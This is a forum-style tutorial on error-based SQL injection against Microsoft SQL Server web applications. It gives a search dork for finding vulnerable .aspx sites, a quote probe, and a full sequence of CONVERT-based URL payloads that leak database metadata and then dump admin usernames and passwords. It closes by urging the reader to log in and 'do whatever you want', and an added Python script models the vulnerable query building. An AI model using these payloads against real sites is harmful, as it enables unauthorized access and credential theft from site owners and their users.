MSSQL INJECTION IN DEPTH

Assalam o Alaikum Friends!

I will try my best to explain everything up to my knowledge.
This is error-based MSSQL. I'm learning union-based MSSQL, but till now I'm unable to figure out how to do that.
So, for error-based MSSQL, first some basics.
In SQL:
1=1 is true
1=0 is false
More generally, when we append a condition to the application's query with AND:
1=(a subquery or expression that evaluates to 1) is true, and the page loads as normal
1=(an expression that is not 1) is false, so the original query returns no row and the page comes back empty or with an error
The trick below does not rely on that true/false difference: it makes the comparison itself fail and reads the result out of the error message.

CASTING in MSSQL
There are two casting functions in MSSQL:
CAST()
usage: CAST(value AS int/nchar/char/varchar/nvarchar)
CONVERT()
usage: CONVERT(int/nchar/char/varchar/nvarchar, value)

And if we use
1=CONVERT(int,(a value which is not a number))
SQL Server cannot turn the string into an integer and raises an error of the form
Conversion failed when converting the nvarchar value 'the value' to data type int.
(older versions word it as a "Syntax error converting ..." message, but they include the value as well). This is the magic: the error message carries the string we asked for, just like error-based injection in MySQL. It only works when the application reflects the database error into the page; a site that shows a generic error page is not exploitable this way.

so lets start
A dork to find candidate MSSQL websites is .aspx?id= on Bing.

When you get a website, put a single quote ( ' ) after the id value and you will get an error like this:

[Image: image.jpg]

Why does it give an error?
As I'm also learning .NET: in .NET some lazy developers build the query like this

string sql = "select * from tblname where id='" + txtIDBox.Text + "'";

So if we look carefully, we can exploit this by putting our own SQL into txtIDBox.Text, which in this case is filled from the URL parameter. Two things to notice: the value sits inside single quotes, so for this exact code a payload has to close the quote first (1' and ... --), and the trailing -- comments out the quote the code appends; when the id is concatenated without quotes, as the examples below assume, the plain 1 and ... -- form is enough. The fix is a parameterized query (SqlCommand with SqlParameter) instead of string concatenation.

IDENTIFY the error
The error must be related to SQL, like in this case:
System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string '12''.
Incorrect syntax near '12''.
System.Data.SqlClient.SqlException is the exception type ADO.NET raises for every error SQL Server sends back, so seeing it in the page tells you two things: the back end is MSSQL, and the application reflects database errors, which is exactly what the CONVERT trick needs. The '12'' in the message is the string literal as SQL Server saw it: our extra quote turned id='12' into id='12'' with the last quote left open.
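Added example, not from the original post: a small Python script that shows what the concatenating code above actually sends to SQL Server and why the single-quote probe errors. The table name tblname and the id parameter are taken from the snippet; the sample error page is constructed from the message quoted above, not captured from a real site. render_query rebuilds the statement for a quoted and an unquoted id, scan_statement walks it the way the T-SQL lexer does (honouring '' escapes and -- comments) to tell an unclosed literal from a well-formed one, and probe_outcome picks the SqlException signatures out of a response.

```python
import re

# Signatures ADO.NET reflects when a stray quote breaks the statement (probe stage).
PROBE_SIGNATURES = {
    "unclosed_quote": re.compile(r"Unclosed quotation mark after the character string '(.*)'\."),
    "syntax_near": re.compile(r"Incorrect syntax near '(.*)'\."),
    "sqlexception": re.compile(r"System\.Data\.SqlClient\.SqlException"),
}


def render_query(user_input, quoted=True):
    """Reproduce the statement the concatenating .NET code sends to SQL Server.

    quoted=True mirrors the snippet above (id='...'); quoted=False is the other
    common case, a numeric id glued in without quotes. tblname is assumed.
    """
    if quoted:
        return "select * from tblname where id='" + user_input + "'"
    return "select * from tblname where id=" + user_input


def scan_statement(sql):
    """Walk the statement like the T-SQL lexer, tracking string literals.

    Returns (well_formed, effective): well_formed is False when a quote is left
    open (the 'Unclosed quotation mark' case); effective is the text SQL Server
    really parses, i.e. everything before a -- comment that starts outside a literal.
    """
    i, in_string = 0, False
    while i < len(sql):
        ch = sql[i]
        if in_string:
            if ch == "'":
                if sql[i + 1:i + 2] == "'":   # '' is an escaped quote inside a literal
                    i += 1
                else:
                    in_string = False
        elif ch == "'":
            in_string = True
        elif sql.startswith("--", i):         # comment: the rest of the line is ignored
            return True, sql[:i]
        i += 1
    return not in_string, sql


def probe_outcome(body):
    """Classify the response to the quote probe: (kind, fragment SQL Server echoed back)."""
    for kind, rx in PROBE_SIGNATURES.items():
        m = rx.search(body)
        if m:
            return kind, (m.group(1) if m.groups() else None)
    return None, None


# Constructed response, modelled on the error text quoted above (not captured from a real site).
SAMPLE_ERROR_PAGE = (
    "System.Data.SqlClient.SqlException: Unclosed quotation mark after the character "
    "string '12''.\nIncorrect syntax near '12''."
)

if __name__ == "__main__":
    for user_input, quoted in [("12'", True),
                               ("1' and 1=CONVERT(int,DB_NAME())--", True),
                               ("1 and 1=CONVERT(int,DB_NAME())--", True),
                               ("1 and 1=CONVERT(int,DB_NAME())--", False)]:
        ok, effective = scan_statement(render_query(user_input, quoted))
        print(f"{'well-formed' if ok else 'BROKEN':11} {effective}")
    print(probe_outcome(SAMPLE_ERROR_PAGE))
```

The third case is the one people get wrong: in a quoted context, 1 and 1=CONVERT(...)-- without a closing quote is perfectly well-formed SQL, because the whole payload including the -- stays inside the string literal and is just compared against id. No error, no leak. Closing the quote first (case two) puts the CONVERT outside the literal and the -- then swallows the quote the application appends.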


I think this is enough.
Let's get some basic info about the database first.
Use DB_NAME() to see the database name:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,DB_NAME())--
Remember, DB_NAME() returns a string value which cannot be converted to an integer, so it throws an error that includes the database name.
You can use DB_NAME(1), DB_NAME(2), DB_NAME(3), ... to list the other databases by id. Ids 1 to 4 are the system databases (master, tempdb, model, msdb), so user databases start at DB_NAME(5); when an id does not exist DB_NAME() returns NULL, there is no conversion error, and the page just loads normally.

[Image: image.jpg]


Now the version with @@version:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(@@version))--


[Image: image.jpg]


Now the database user name with USER_NAME():
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(USER_NAME()))--
USER_NAME() gives the database user the application runs as (often dbo); SYSTEM_USER gives the login it connects with.

[Image: image.jpg]

Now start enumerating tables.

There is no LIMIT clause in MSSQL; we use TOP 1 instead, so the subquery returns exactly one value:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 table_name from information_schema.tables))--
Note that information_schema.tables only lists the tables of the current database, the one DB_NAME() returned.


[Image: image.jpg]


Well, we got our first table. Now go for the second: exclude what we already have with NOT IN, so TOP 1 returns the next one:

site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 table_name from information_schema.tables where table_name not in ('table1')))--

[Image: image.jpg]

And we got our second table. In this way we enumerate all the tables, adding each name to the NOT IN list; when the list is exhausted the subquery returns NULL, no conversion error fires, and the page loads normally, which tells you there are no more.

Let's move directly to our favourite table, tbladmin, which shows up after excluding the first four:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 table_name from information_schema.tables where table_name not in ('table1','tbl2','tbl3','tbl4')))--

[Image: image.jpg]


Well, we got the admin table, so let's start enumerating its columns:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 column_name from information_schema.columns where table_name ='tbladmin' ))--

and it will show us the first column of the admin table.

[Image: image.jpg]


For the second column:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 column_name from information_schema.columns where table_name ='tbladmin' and column_name not in ('nid')))--

[Image: image.jpg]

Now we got the second column; let's grab the next one:

site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 column_name from information_schema.columns where table_name ='tbladmin' and column_name not in ('nid','loginid')))--


[Image: image.jpg]


Now we have our required columns; let's dump data from them:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 loginid from tbladmin))--

[Image: image.jpg]


We got the username; now let's get the password:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 password from tbladmin))--

[Image: image.jpg]


Well, we got our required information. Now log in and do whatever you want.
If you want to see the second username, use the same NOT IN method you used for table_name and column_name, i.e.:
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 loginid from tbladmin where loginid not in('admin')))--

and the same for all other columns. Since every request leaks exactly one value, this gets slow on big tables; scripting the loop is the usual answer.
Hope you got this.


(Well, this is the 3rd time that I injected a site with patience and the username and password is admin, but this is not about getting access to the site, rather this is about injecting an MSSQL server.)
